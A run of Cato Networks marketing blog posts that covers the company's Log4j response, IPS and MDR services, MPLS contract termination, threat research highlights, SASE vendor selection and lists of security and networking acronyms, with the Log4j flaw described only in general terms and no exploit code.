Cato Networks Rapid Response to The Apache Log4J Remote Code Execution Vulnerability On December 9th, 2021, the security industry became aware of a new vulnerability, CVE-2021-44228. With a CVSS (Common Vulnerability Scoring System) score of a perfect 10.0, CVE-2021-442288 has the highest and most critical alert level.
To give some technical background, a flaw was found in the Java logging library “Apache Log4j 2” in versions from 2.0-beta9 to 2.14.1. This could allow a remote attacker to execute code on a server running Apache if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup.
More simply put, this exploit would allow attackers to execute malicious code on Java applications, and as such, it poses a significant risk due to the prevalence of Log4j across the global software estate.
Cato’s Security Researchers Never Sleep, So You Can
Since the disclosure, the security analysts here at Cato Networks have been working tirelessly to identify, pinpoint and mitigate any potential vulnerability or exposure that our customers may have to this threat.
Here is our internal log of operations:
9th December 2021: The security community became aware of active exploitation attempts in the Apache Log4j software.
10th December 2021: Cato Networks identified the traffic signature associated with this exploit and started actively monitoring our customer base.
11th December 2021: Cato Networks has implemented a global blocking rule within our IPS for all Cato customers to mitigate this vulnerability.
[boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass"] Join one of our Cyber Security Masterclasses | Go now [/boxlink]
Action Items to Cato Customers: Just Read eMails
Cato customers have already been informed that if they have the Cato IPS enabled, they are protected. Cato is actively blocking the traffic signature of this vulnerability automatically. No patching or updates to the Cato platform is required.
This is the greatness of an IPS-as-a-Service managed by some of the greatest security researchers. Our customers don’t have to perform any maintenance work to their IPS, and can make a much better use of their time: first by communicating to their upper management that their network is already secured and second, if they are using Apache products, by following the vendor’s advisory for remediation. Thanks to Cato, they can patch Apache at their own speed without fear of infiltration and exploitation.
What about the Cato SASE Cloud? Was it exposed?
In short, no. Our engineering and operations teams have worked side by side with our security analysts to investigate our own cloud and confirm that based on everything that we know, we are not vulnerable to this exploit.
Eventually, no one is 100% bullet proof. The test is really about what you have done to minimize the potential risk, and what you can do to mitigate it when it manifests. Cato has all the resources, the skills and the talent to minimize our attack surface, and make sure that our ability to respond to emerging threats is at the maximum. This is the right balance our customers deserve.
Sadly, This Is Not Over Just Yet
As often happens with such high-profile and critical CVEs, more data and IoCs (Indicators of Compromise) are surfacing as more analysts across the IT and cyber communities dive deeper into the case.
Our researchers are continuing their work as well, monitoring new discoveries across the community on the one hand, and running our own research and analysis on the other – all together targeted to make sure our customers remain protected.
IPS (Intrusion Prevention System) is a technology for securing networks by scanning and blocking malicious network traffic. By identifying suspicious activities and dropping packets, an IPS can help reduce the attack surface of an enterprise network. Security attacks like DoS (Denial of Service), brute force attacks, viruses, worms and attacking temporary exploits can all be...
IPS Features and Requirements: Is an Intrusion Prevention System Enough? IPS (Intrusion Prevention System) is a technology for securing networks by scanning and blocking malicious network traffic. By identifying suspicious activities and dropping packets, an IPS can help reduce the attack surface of an enterprise network. Security attacks like DoS (Denial of Service), brute force attacks, viruses, worms and attacking temporary exploits can all be prevented with an IPS.
However, an IPS alone is not always enough to deal with the growing number of cyber attacks, which are negatively impacting business continuity through ransomware, network outages and data privacy breaches. This blog post explores how to implement an IPS in your overall security strategy with SASE. But first, let’s learn a bit more about IPS.
[boxlink link="https://www.catonetworks.com/resources/eliminate-threat-intelligence-false-positives-with-sase?utm_source=blog&utm_medium=top_cta&utm_campaign=eliminate_threat"] Eliminate Threat Intelligence False Positives with SASE
| Get eBook [/boxlink]
IPS vs. IDS - What’s the Difference?
IPS is often confused with IDS (Intrusion Detection System). IDS is the older generation of IPS. As the name implies, it detects and reports malicious activities, without any active blocking mechanisms. As a result, an IDS requires more active attention from IT to immediately block suspicious traffic, but on the other hand, legitimate traffic is never accidentally blocked, as sometimes happens with IPS. IPS is also sometimes referred to as IDPS.
IPS Features – How it Works
Most IPS solutions sit behind the firewall, though one type of IPS, HIPS (host-based IPS) sits on endpoints. The IPS mechanism operates as follows.
Scans and analyzes network traffic, and watches packet flows
Detects suspicious activities
Sends alarms to IT
Drops malicious packets
How Does IPS Detect Malicious Activity?
There are two methods the IPS can implement to accurately detect cyberattacks.
1. Signature-based Detection
IPS compares packet flows with a dictionary of CVEs and known patterns. When there is a pattern match, the IPS automatically alerts and blocks the packets. The dictionary can either contain patterns of specific exploits, or educated guesses of variants of known vulnerabilities.
2. Anomaly-based Detection
IPS uses heuristics to identify potential threats by comparing them to a known and approved baseline level and alerting in the case of anomalies.
IPS needs to ensure:
Performance – to enable network efficiency
Speed – to identify exploitations in real-time
Accuracy – to catch the right threats and avoid false positives
IPS Joined with the Power of SASE
While IPS was built as a stand-alone solution, today it is best practice to complement it and enhance its capabilities by using IPS that is delivered as part of a SASE solution. This also enables IT to overcome the shortcomings of the stand-alone IPS:
Stand-alone IPS: Shortcomings
Inability to process encrypted packets without this having a huge impact on performance
Perimeter-based approach, which protects from incoming traffic only, and not from internal threats. (Read more about it in our ZTNA hub).
Inspection that is location-bound and does not usually include mobile and cloud traffic
High operational costs when IT updates new signatures and patches
IPS and SASE: Key Benefits
SASE is a global, cloud-native service that converges networking and security functions in one platform. By implementing IPS with SASE, IPS will:
Ensure high performance – scans and analyzes TLS-encrypted traffic without any capacity constraints that would affect performance or scaling capabilities
Secure the network, not the perimeter – inspects inbound and outbound traffic, both on a WAN or to and from the public Internet
Scan and protect all edges - includes remote users and branches, regardless of location and infrastructure (cloud or other)
Always secure and up-to-date – automatically updates the latest signatures, since these updates come from the SASE cloud, without any hands-on involvement from IT
Reducing the Attack Surface with IPS and SASE
IPS adds an important layer of security to enterprise networks, especially in this day and age of more and more highly sophisticated cyber attacks. However, to get the most out of IPS, while reducing IT overhead and costs, it is recommended to implement an IPS together with SASE.
This provides organizations with all IPS capabilities, across their entire network and for all traffic types. In addition, with SASE, the security signatures and patches are managed entirely by the SASE cloud, eliminating false positives and removing resource-intensive processes from IT’s shoulders.
Cato is the leading SASE provider, enabling organizations to securely and optimally connect any user to any application anywhere on the globe. To get a consultation or a demo of the Cato SASE Cloud and how it works with IPS, Contact Us.
In the era of digital transformation, your organization might be looking for a more agile and cloud-friendly alternative to MPLS. But while getting off your MPLS contract might seem daunting due to hefty early termination fees, it’s actually easier and less expensive than you might think. Let’s look at the four steps required for terminating...
How to Terminate Your MPLS Contract Early In the era of digital transformation, your organization might be looking for a more agile and cloud-friendly alternative to MPLS. But while getting off your MPLS contract might seem daunting due to hefty early termination fees, it’s actually easier and less expensive than you might think. Let’s look at the four steps required for terminating your MPLS contract, so you can find more flexible solutions (like SASE).
This blog post is based on the e-book “How to Terminate Your MPLS Contract Early”, which you can view here.
4 Steps for Your Get-Off-MPLS Strategy
Here are the four steps we recommend to help you make a smooth transition from MPLS to the solution of your choice, like SASE:
Understand the scope and terms of your MPLS contract
Identify the MPLS circuits that can (and should) be replaced
Involve your internal finance partners
Use these negotiating tactics with your MPLS provider
Now let’s dive into each one of them.
1. Understand the Scope and Terms of your MPLS Contract
MPLS contracts are long legal documents, but it’s important to understand which terms and conditions you’re obliged to. Here are some important things to look out for:
Does your termination date refer to the entire agreement, or to single MPLS circuits? In most contracts, the latter is the case. This means that your organization might have a number of separate terms for various circuits with different start and end dates. In such cases, it’s recommended to identify circuits that are about to expire the soonest to start the migration with them.
Is there a Minimum Annual Revenue Commitment (MARC)? Many MPLS contracts require a minimal monthly or annual spend. If you retire one of your circuits, and your spending diminishes to below that minimum. you might be subject to a financial penalty.
What is your liability for terminating an MPLS circuit before the termination date? Do you have to pay the entire sum of the fees, or maybe some of them? Discontinuing might still be worth it, despite the fees.
What’s your notice of termination period? Check how early you have to notify the carrier about discontinuing services.
Are you subject to automatic renewal? Are you locked into the contract unless you notify the carrier otherwise?
By understanding what your contract requires, you can now proceed to the next steps of determining your termination and transition plan.
[boxlink link="https://www.catonetworks.com/resources/terminate-your-mpls-contract-early-heres-how/?utm_source=blog&utm_medium=top_cta&utm_campaign=terminate_mpls"] Terminate Your MPLS Contract Early | Here's How [/boxlink]
2. Identify the MPLS Circuits that Can (and Should) Be Replaced
To get a better picture of your available termination options, we recommend preparing a spreadsheet that will help you determine which circuits to target first:
Create a row for each circuit
Detail the liabilities and termination dates for each one.
Order the circuits according to termination dates to see which ones can be migrated the soonest.
Identify circuits that can be terminated without violating MARC and incurring penalties
Check the monthly rate for circuits, in case you want to overlap through the migration
MARC Violation (Y/N)
Monthly Rate (Y/N)
Now that you have your circuit status laid out, identify additional factors that will influence your migration options and negotiation:
How much are you spending with your carrier overall? Even if you have early MPLS termination fees, you may be able to negotiate and leverage additional services to help waive them.
What’s the ROI of your services after switching to SASE? The numbers will help you decide which penalties are worth paying.
Now that you’ve identified different action plans, it’s time to get the finance department involved.
Migrating from MPLS to SASE with Cato Networks
Cato is the world’s first SASE platform, converging SD-WAN and network security into a global cloud-native service. Cato optimizes and secures application access for all users and locations. Using Cato SASE Cloud, customers easily migrate from MPLS to SD-WAN, improve connectivity to on-premises and cloud applications, enable secure branch Internet access everywhere, and seamlessly integrate cloud data centers and remote users into the network with a zero-trust architecture. With Cato, your network and business are ready for whatever’s next. Learn more.
In Q1 2021, 190 billion traffic flows passed through Cato’s SASE Network. Leveraging deep network visibility and proprietary machine learning algorithms, our MDR team set out to analyze and identify new cyber threats and critical security trends, and have recently published their findings in the SASE Threat Research Report. Below, we provide you with 5...
Security Threat Research Highlights #1 In Q1 2021, 190 billion traffic flows passed through Cato’s SASE Network. Leveraging deep network visibility and proprietary machine learning algorithms, our MDR team set out to analyze and identify new cyber threats and critical security trends, and have recently published their findings in the SASE Threat Research Report. Below, we provide you with 5 key insights from this report.
Key Highlights from Cato Networks’ SASE Threat Research Report
#1. Top 5 Threat Types in 2021
By using machine learning to identify high-risk threats and verified security incidents, Cato is able to identify the most common types of attacks in Q1 2021. The top five observed threat types include:
Network Scanning: The attacker is detected testing different ports to see which services are running and potentially exploitable.
Reputation: Inbound or outbound communications are detected that point to known-bad domains or IP addresses.
Vulnerability Scan: A vulnerability scanner (like Nessus, OpenVAS, etc.) is detected running against a company’s systems.
Malware: Malware is detected within network traffic.
Web Application Attack: Attempted exploitation of a web application vulnerability, such as cross-site scripting (XSS) or SQL injection, is detected.
The top three threat types demonstrate that cybercriminals are committed to performing reconnaissance of enterprise systems (using both port and vulnerability scans) and are successfully gaining initial access (as demonstrated by the large number of inbound and outbound suspicious traffic flows).
[boxlink link="https://www.catonetworks.com/resources/ransomware-is-on-the-rise-catos-security-as-a-service-can-help?utm_source=blog&utm_medium=top_cta&utm_campaign=ransomware"] Ransomware is on the Rise | Download eBook [/boxlink]
#2. Regional Bans Create False Sense of Security
In the news, most cybercrime and other online malicious activity are attributed to a small set of countries. As a result, it seems logical that creating firewall rules blocking traffic to and from these countries would dramatically improve a company’s security posture.
However, these regional bans actually create a false sense of security. The vast majority of malicious activity originates in the US, accounting for more than these four largest sources (Venezuela, China, Germany, and Japan) put together. Regional bans have little or no impact because most malware sources and command & control servers are in the US.
#3. Cybercriminals Exploit Remote Administration Tools
Remote access and administration tools like, and TeamViewer became significantly more popular during the pandemic. These tools enabled businesses to continue functioning despite a sudden and forced transition to remote work.
However, these tools are popular with cybercriminals as well. Attackers will try to brute-force credentials for these services and use them to gain direct access to a company’s environment and resources. RDP is now a common delivery vector for ransomware, and a poorly-secured TeamViewer made the Oldsmar water treatment hack possible.
#4. Legacy Software and PHP are Commons Targets
An analysis of the Common Vulnerabilities and Exposures (CVEs) most targeted by cybercriminals reveals some interesting trends. The first is that PHP-related vulnerabilities are extremely popular, making up three of the top five vulnerabilities and potentially allowing an attacker to gain remote code execution (RCE).
Another important takeaway is that cybercriminals are targeting age-old threats lurking on enterprise networks. Cybercriminals are commonly scanning for end-of-life, unsupported systems and vulnerabilities that are over 20 years old.
#5. Enterprise Traffic Flows Aren’t What You Expect
The analysis of business network traffic flows shows that Microsoft Office and Google applications are the two most commonly used cloud apps in enterprise networks.
However, that is not to say that they are the most common network flows on enterprise networks. In fact, the average enterprise has more traffic to TikTok than Gmail, LinkedIn, or Spotify. These TikTok flows threaten enterprise security. Consumer applications can be used to deliver malware or phishing content, and the use of unsanctioned apps creates new vulnerabilities and potential attack vectors within a company’s network.
Improve Your Network Visibility and Security with Cato
Cato’s quarterly SASE Threat Research Report demonstrated the importance of deep network visibility and understanding for enterprise security. While some of the trends (such as the exploitation of remote access solutions) may have been predictable, others were less so. To learn more about the evolving threat landscape, read the full report, and stay tuned for the next one.
Cato was able to generate this report based on the deep visibility provided by its SASE network. Achieving this level of visibility is essential for enterprises looking to identify the top trends and security threats within their networks.
Managed Detection and Response (MDR) is a security service designed to provide ongoing protection, detection, and response for cybersecurity threats. MDR solutions use machine learning to investigate, alert, and contain cyber threats at scale. Additionally, MDR solutions should include a proactive element, including the use of threat hunting to identify and remediate vulnerabilities or undetected...
Understanding Managed Detection and Response: What is MDR? Managed Detection and Response (MDR) is a security service designed to provide ongoing protection, detection, and response for cybersecurity threats. MDR solutions use machine learning to investigate, alert, and contain cyber threats at scale. Additionally, MDR solutions should include a proactive element, including the use of threat hunting to identify and remediate vulnerabilities or undetected threats within an enterprise’s IT environment.
As the name suggests, MDR should be a fully managed solution, on top of being an automated one. While MDR relies heavily on advanced technology for threat detection and rapid incident response, human analysts should also be involved in the process to validate alerts and ensure that the proper responses are taken.
According to Gartner, MDR services provide turnkey threat detection and response through remotely delivered, 24/7 security operations center capabilities. Gartner predicts that half of companies will partner with an MDR provider by 2025.
[boxlink link="https://www.catonetworks.com/services?utm_source=blog&utm_medium=top_cta&utm_campaign=MDR_page#managed-threat-detection-and-response"] Read about our Managed Threat Detection and Response (MDR) [/boxlink]
The Need for MDR
MDR has evolved to meet the cybersecurity needs of the modern enterprise. The rapid expansion of the cyber threat landscape and widespread use of automation by threat actors means that everyone is at risk of cyberattacks. These threats are evolving quickly with new ones introduced every day.
Detecting and responding to these advanced threats requires capabilities that many enterprises are lacking. On average, it takes six months for an enterprise to identify a data breach after it has occurred (the “dwell time”), a number that has doubled in the last two years. Additionally, the cost of a data breach continues to rise and is currently almost $4 million.
MDR is important because it provides enterprises with the security capabilities that they lack in-house. With MDR, enterprises can rapidly achieve the level of security needed to prevent, detect, and respond to advanced threats, as well as sustain these capabilities as cyber threats continue to evolve.
The Challenges MDR Confronts
A six-month dwell time demonstrates that businesses are struggling to identify and respond to cybersecurity incidents, due to various factors, including:
Lack of In-House Security Talent: The cybersecurity industry is experiencing a talent gap with an estimated 3.1 million unfilled roles worldwide, and 64% of enterprises struggle to find qualified security talent. With MDR, enterprises can leverage external talent and resources to fill security gaps.
Complex Security Tools: Security solutions may require careful tuning to an enterprise’s environment, which requires expertise with these tools. MDR eliminates the need for enterprises to maintain these skills in-house.
Security Alert Overload: The average enterprise’s security operations center (SOC) receives over 10,000 security alerts per day, which can easily overwhelm a security team. MDR only notifies the enterprise of threats that require their attention.
Advanced Threat Prevention and Preparation: Preventing, detecting, and remediating attacks by threat actors requires specialized knowledge and expertise. The MDR service includes incident prevention, detection, and response.
MDR by Cato
Cato offers MDR services to its Cato SASE Cloud customers. Some of the key features of Cato MDR include:
Zero-Footprint Data Collection: Cato’s MDR and Zero-Day threat prevention services are built on Cato Cloud, its cloud-native SASE network. With network visibility and security built into the network infrastructure itself, there is no need for additional installations.
Automated Threat Hunting: Cato performs automated threat hunting, leveraging big data and machine learning to identify anomalous and suspicious traffic across its platform. Cato’s rich dataset and wide visibility enable it to rapidly and accurately identify potential threats.
Human Verification: The results of Cato’s automated analysis are verified by human security analysts. This prevents action from being taken based on false positive detections.
Network Level Threat Containment: Cato controls the infrastructure that all network traffic flows over and has application-layer visibility into traffic. This enables Cato to isolate infected systems at the network level.
Guided Remediation: Cato provides guidance to help enterprises through the process of remediating a cybersecurity incident. This helps to ensure that the threat has been eliminated before quarantine is lifted and normal operations are restored.
Cato’s MDR has immediate ‘time to value’ because it can roll out immediately with no additional solution deployment required. To learn more about Cato SASE Cloud and Cato MDR service, contact us. In our next post, MDR: The Benefits of Managed Detection and Response, we take a look at a number of key benefits that enterprises can expect when partnering with an MDR provider.
Before diving into the benefits of partnering with an MDR provider, we recommend reading our previous post, MDR: Understanding Managed Detection and Response. What is MDR? In a nutshell, MDR provides ongoing threat detection and response for network security threats using machine learning to investigate, alert, and contain security threats at scale. The “managed” in...
The Benefits of Managed Detection and Response (MDR) Before diving into the benefits of partnering with an MDR provider, we recommend reading our previous post, MDR: Understanding Managed Detection and Response.
What is MDR?
In a nutshell, MDR provides ongoing threat detection and response for network security threats using machine learning to investigate, alert, and contain security threats at scale. The “managed” in MDR refers to the fact that these automated solutions are complemented by human operators who validate alerts and support proactive activities such as threat hunting and vulnerability management.
According to Gartner, half of companies will partner with an MDR provider by 2025. This rapid adoption is driven by several factors, including the expanding cybersecurity skills gap and the emergence of technologies like secure access service edge (SASE) and zero trust network access (ZTNA) that enable MDR providers to more effectively and scalably offer their services.
[boxlink link="https://go.catonetworks.com/Eliminate-Threat-Intelligence-False-Positives-with-SASE.html?utm_source=blog&utm_medium=top_cta&utm_campaign=threat_elements"] Eliminate Threat Intelligence False Positives | eBook [/boxlink]
Managed Detection and Response Benefits
MDR providers act as a full-service outsourced SOC for their customers, and partnering with an MDR provider carries a number of benefits:
24/7 Monitoring: MDR providers offer round-the-clock monitoring and protection for client networks. Since cyberattacks can happen at any time, this constant protection is essential for rapid response to threats.
Proactive Approach: MDR offers proactive security, such as threat hunting and vulnerability assessments. By identifying and closing security holes before they are exploited by an attacker, MDR helps to reduce cyber risk and the likelihood of a successful cybersecurity incident.
Better Intelligence: MDR providers have both broad and deep visibility into client networks. This enables them to develop and use threat intelligence based on both wide industry trends and enterprise-specific threats during incident detection and response.
Experienced Analysts: MDR helps to close the cybersecurity skills gap by providing customers with access to skilled cybersecurity professionals. This both helps to meet headcount and ensures that customers have access to specialized skill sets when they need them.
Vulnerability Management: Vulnerability management can be complex and time-consuming, and many companies rapidly fall behind. MDR providers can help to identify vulnerable systems, perform virtual patching, and support the installation of required updates.
Improved Compliance: MDR providers often have expertise in regulatory compliance, and their solutions are designed to meet the requirements of applicable laws and regulations. Additionally, the deep visibility of an MDR provider can simplify and streamline compliance reporting and audits.
Managed Detection and Response Tools
When offered as part of a SASE solution, MDR delivers the following key benefits:
Zero-Footprint Data Collection: With MDR and zero-day threat prevention services built into the SASE Cloud, additional security solutions are unnecessary.
Automated Threat Hunting: When MDR monitors for suspicious network flows using ML/AI, this allows rapid, scalable detection of potential cyber threats, decreasing the time that an intrusion goes undetected (“dwell time”).
Human Verification: All automatically-generated security alerts are reviewed and validated by the SASE vendor’s SOC team. This eliminates false positives and ensures that true threats receive the attention that they deserve.
Network Level Threat Containment: The SASE vendor’s control over the underlying network infrastructure enables it to quarantine infected computers. This prevents threats from spreading while remediation is occurring.
Guided Remediation: MDR built into SASE provides contextual data and remediation recommendations for identified threats to the SASE’s vendor security team.
Adopting MDR for your Organization
Cato’s MDR has immediate ‘time to value’ for its Cato SASE Cloud customers because security is built into its network infrastructure and security services can be rolled out immediately. This allows companies to rapidly achieve the security maturity needed to achieve regulatory compliance and protect themselves against cyber threats.
To learn more about Cato’s MDR services contact us and request a free demo.
We’ve all heard of AV and VPN, but there are many more cybersecurity-related acronyms and abbreviations that are worth taking note of. We gathered a list of the key acronyms to help you keep up with the constantly evolving cybersecurity landscape. SASE Secure Access Service Edge (SASE) is a cloud-based solution that converges network and...
26 Cybersecurity Acronyms and Abbreviations You Should Get to Know We’ve all heard of AV and VPN, but there are many more cybersecurity-related acronyms and abbreviations that are worth taking note of. We gathered a list of the key acronyms to help you keep up with the constantly evolving cybersecurity landscape.
Secure Access Service Edge (SASE) is a cloud-based solution that converges network and security functionalities. SASE’s built-in SD-WAN functionality offers network optimization, while the integrated security stack – including Next Generation Firewall (NGFW), Secure Web Gateway (SWG), Zero Trust Network Access (ZTNA), and more – secures traffic over the corporate WAN. According to Gartner (that coined the term), SASE is “the future of network security.”
[boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass_lobbypage"] Cybersecurity Master Class | Check it out [/boxlink]
Cloud Access Security Broker (CASB) sits between cloud applications and users. It monitors all interactions with cloud-based applications and enforces corporate security policies. As cloud adoption grows, CASB (which is natively integrated into SASE solutions) becomes an essential component of a corporate security policy.
Zero Trust Network Access (ZTNA), also called a software-defined perimeter (SDP), is an alternative to Virtual Private Network (VPN) for secure remote access. Unlike VPN, ZTNA provides access to corporate resources on a case-by-case basis in compliance with zero trust security policies. ZTNA can be deployed as part of a SASE solution to support the remote workforce of the modern distributed enterprise.
Software-Defined Perimeter (SDP) is another name for ZTNA. It is a secure remote access solution that enforces zero trust principles, unlike legacy remote access solutions.
Zero Trust Edge (ZTE) is Forrester’s version of SASE and uses ZTNA to provide a more secure Internet on-ramp for remote sites and workers. A ZTE model is best implemented with SASE, which distributes security functionality at the network edge and enforce zero trust principles across the corporate WAN.
Deep Packet Inspection (DPI) involves looking at the contents of network packets rather than just their headers. This capability is essential to detecting cyberattacks that occur at the application layer. SASE solutions use DPI to support its integrated security functions.
Next-Generation Firewall (NGFW) uses deep packet inspection to perform Layer 7 application traffic analysis and intrusion detection. NGFW also has the ability to consume threat intelligence to make informed threat decisions and may include other advanced features beyond those of the port/protocol inspection of the traditional firewall.
Firewall as a Service (FWaaS) delivers the capabilities of NGFW as a cloud-based service. FWaaS is one of the foundational security capabilities of a SASE solution.
Intrusion Prevention System (IPS) is designed to detect and block attempted attacks against a network or system. In addition to generating alerts, like an intrusion detection system (IDS) would, an IPS can update firewall rules or take other actions to block malicious traffic.
Secure Web Gateway (SWG) is designed to protect against Internet-borne threats such as phishing or malware and enforce corporate policies for Internet surfing. SWG is a built-in capability of a SASE solution, providing secure browsing to all enterprise employees.
Next Generation Anti-Malware (NG-AM) uses advanced techniques, such as machine learning and anomaly detection to identify potential malware. This allows detecting modern malware, which is designed to evade traditional, signature-based detection schemes.
Unified Threat Management (UTM) is a term for security solutions that provide a number of different network security functions. SASE delivers all network security needs from a cloud service, eliminating the hassle of dealing with appliance life-cycle management of UTM.
Data Loss Prevention (DLP) solutions are designed to identify and respond to attempted data exfiltration, whether intentional or accidental. The deep network visibility of SASE enables providing DLP capabilities across the entire corporate WAN.
Web Application Firewall (WAF) monitors and filters traffic to web applications to block attempted exploitation or abuse of web applications. SASE includes WAF functionality to protect web applications both in on-premises data centers and cloud deployments.
Security Information and Event Management (SIEM) collects, aggregates, and analyzes data from security appliances to provide contextual data and alerts to security teams. This functionality is necessary for legacy security deployments relying on an array of standalone solutions rather than a converged network security infrastructure (i.e. SASE).
Security Operations Center (SOC) is responsible for protecting enterprises against cyberattacks. Security analysts investigate alerts to determine if they are real incidents, and, if so, perform incident response and remediation.
Managed Detection and Response (MDR) is a managed security service model that provides ongoing threat detection and response by using AI and machine learning to investigate, alert, and contain threats. When MDR is incorporated into a SASE solution, SOC teams have immediate, full visibility into all traffic, eliminating the need for additional network probes or software agents.
Transport Layer Security (TLS) is a network protocol that wraps traffic in a layer of encryption and provides authentication of the server to the client. TLS is the difference between HTTP and HTTPS for web browsing.
Secure Sockets Layer (SSL) is a predecessor to TLS. Often, the protocol is referred to as SSL/TLS.
Threat Intelligence (TI) is information designed to help with detecting and preventing cyberattacks. TI can include malware signatures, known-bad IP addresses and domain names, and information about current cyberattack campaigns.
Common Vulnerabilities and Exposure (CVE) is a list of publicly disclosed computer security flaws. . Authorities like MITRE will assign a CVE to a newly-discovered vulnerability to make it easier to track and collate information about vulnerabilities across multiple sources that might otherwise name and describe it in different ways.
Advanced Persistent Threat (APT) is a sophisticated cyber threat actor typically funded by nation-states or organized crime. These actors get their name from the fact that they have the resources and capabilities required to pose a sustained threat to enterprise cybersecurity.
Distributed Denial of Service (DDoS) attacks involve multiple compromised systems sending spam requests to a target service. The objective of these attacks is to overwhelm the target system, leaving it unable to respond to legitimate user requests.
Extended Detection and Response (XDR) is a cloud-based solution that integrates multiple different security functions to provide more comprehensive and cohesive protection against cyber threats. It delivers proactive protection against attacks by identifying and blocking advanced and stealthy cyberattacks.
Security Service Edge (SSE) moves security functionality from the network perimeter to the network edge. This is the underlying principle behind SASE solutions.
Indicators of Compromise (IoC) is data that can be used to determine if a system has been compromised by a cyberattack such as malware signatures or known-based IP addresses or domains. IOCs are commonly distributed as part of a threat intelligence feed.
When deciding to digitally transform your network to SASE, the large number of vendors out there might be confusing. What’s the best approach to take when comparing the different service providers? This blog post will provide you a methodical way to manage the conversations with any potential vendor, so you can ensure their solution can...
Navigating Your First Steps with a Potential SASE Vendor When deciding to digitally transform your network to SASE, the large number of vendors out there might be confusing. What’s the best approach to take when comparing the different service providers? This blog post will provide you a methodical way to manage the conversations with any potential vendor, so you can ensure their solution can answer your needs.
To get the full SASE RFP template to help you navigate the vendor vetting process, click here. But first, let’s understand what SASE is.
What is SASE?
SASE (Secure Access Service Edge) is an innovative network and security architecture that is being increasingly adopted by global organizations. As a unified, global and cloud-based network that supports all edges, SASE improves network performance, reduces the attack surface and minimizes IT overhead.
[boxlink link="https://www.catonetworks.com/resources/sase-rfi-rfp-template/?utm_source=blog&utm_medium=top_cta&utm_campaign=sase_rfi"] SASE RFI Made Easy | Get the Template [/boxlink]
What is SASE?
SASE (Secure Access Service Edge) is an innovative network and security architecture that is being increasingly adopted by global organizations. As a unified, global and cloud-based network that supports all edges, SASE improves network performance, reduces the attack surface and minimizes IT overhead.
What to Discuss with Potential SASE Vendors
We recommend discussing four main categories with your vendor as part of your RFI process:
Your business and IT
The vendor’s architecture
The vendor’s capabilities
The vendor’s service and support
Let’s dive into each one and see which aspects should be covered.
1. Your Business and IT
The purpose of this first discussion area is to help vendors to understand your business goals and your existing architecture. This will enable them to customize their solution to your needs and explain the value it can provide you.
Discussion points should include:
Your business - provide an overview of your business, as well as the SASE project’s business goals in your eyes.
IT architecture - describe your topology and stack, including your network architecture, technologies, topologies, geographies and security capabilities. Include any existing IT projects you are running or plan to incorporate in the future.
Use cases - explain your current and planned use cases. Include geographies, mobile users, branches, cloud migration plans, and more.
Pro tip: provide the vendor with information about your future business goals that are seemingly unrelated to the project. You might be surprised at how SASE can help you achieve them.
2. SASE Architecture
The following section of the SASE RFI template will enable you to validate that the vendor’s SASE architecture meets business network needs. For example, SD-WAN, global reach, where elements are placed, and more.
Discussion points include:
Architecture components - understand how the vendor provides SD-WAN, secure branch access, cloud optimization, global connectivity and mobile access.
Architecture capabilities - ensure the architecture can support and provide high availability, stability, scalability, high performance, and simplified management.
Architecture diagram - ask to see a diagram of the vendor’s architecture.
Pro tip: Ask the vendor to explain how the different components and capabilities contribute to the success of the project and your business goals.
3. SASE Capabilities
This third section in the SASE RFP template includes all the capabilities that will improve your network and security capabilities. You can pick and choose which capabilities you need now, but make sure your SASE vendor can expand to any additional needs you will need in the future.
Capabilities to discuss:
SD-WAN - discuss link management capabilities, traffic routing and QoS, managing voice and latency-sensitive traffic, supported throughputs and edge devices, monitoring and reporting capabilities, how site provisioning works, and roll out strategies.
Security - understand how traffic is encrypted, which threat prevention and threat detection capabilities are available, how branch and cloud security are implemented, how mobile users are secured, which identity and users awareness systems are incorporated, how policies are managed and enforced and which analytics and reporting capabilities are provided.
Cloud - Which components are provided, which integrations are included and how traffic is optimized.
Mobile - How mobile users are connected to the network while optimizing and securing traffic, and if ZTNA is provided.
Global Connectivity - How traffic is optimized and latency is reduced from site to site and across the internet.
Pro tip: Ask the vendor to weigh in on which capabilities can answer your business goals.
4. SASE Support and Services
This fourth and final section of the SASE RFP template is about the relationship between you and the vendor after implementing SASE. It includes the co-management and maintenance of the project, what happens if things go wrong and how you can make changes after roll out.
Discussion points include:
Support and professional services - When and how support is provided, what the SLAs are and which professional services are available.
Managed services - which services are provided, what the different packages are, co-management capabilities, what is available through self-service and outsourcing options.
Pro tip: Ask to speak with existing customers who’ve used support services to find out how the vendor deals with issues.
Next Steps for Finding a SASE Vendor
SASE provides IT managers and network and security teams with a converged, simplified solution that replaces all existing point solutions. However, it’s important to choose the right vendor. A good SASE vendor will answer all of an organization's existing and future needs.
Take your time to discuss all the points from above with the vendor, until you’re confident that your employees’ needs will be answered and the business can continue to grow without network and security frictions.
The discussion points in this blog post are based on a more comprehensive RFP template prepared by Cato Networks. You can get the full template free of charge here.
You probably know what WAN stands for, but what about all of the other acronyms and abbreviations in the networking world? Here’s a list of the key acronyms to help you keep up with the latest in WAN transformation. SASE Secure Access Service Edge (SASE) converges network and security functionalities into a single cloud-based solution....
23 Good-To-Know Networking Acronyms and Abbreviations You probably know what WAN stands for, but what about all of the other acronyms and abbreviations in the networking world? Here’s a list of the key acronyms to help you keep up with the latest in WAN transformation.
Secure Access Service Edge (SASE) converges network and security functionalities into a single cloud-based solution. SASE merges the network optimization capabilities of SD-WAN with a full security stack, including Next Generation Firewall (NGFW), Secure Web Gateway (SWG), Zero Trust Network Access (ZTNA), and more. According to Gartner that coined the term, SASE is “the future of network security.”
Software-Defined Wide Area Network (SD-WAN) is a virtual WAN architecture offering optimized traffic routing over multiple different media (broadband, MPLS, 5G/LTE, etc.). By choosing the best available path, SD-WAN provides better performance and reliability than broadband Internet. Keep in mind however, that unless SD-WAN is deployed as part of SASE, it can’t support global connectivity, network optimization, WAN and Internet security, cloud acceleration, and remote users.
Multiprotocol Label Switching (MPLS) routes traffic over telecommunications networks using short path labels instead of longer network addresses. MPLS improves the performance and reliability of traffic flows, yet remains an expensive, rigid solution with limited capacity.
[boxlink link="https://www.catonetworks.com/resources/the-top-seven-use-cases-for-sase?utm_source=blog&utm_medium=top_cta&utm_campaign=7_sase_usecase"] Top 7 Use Cases for SASE | Download eBook [/boxlink]
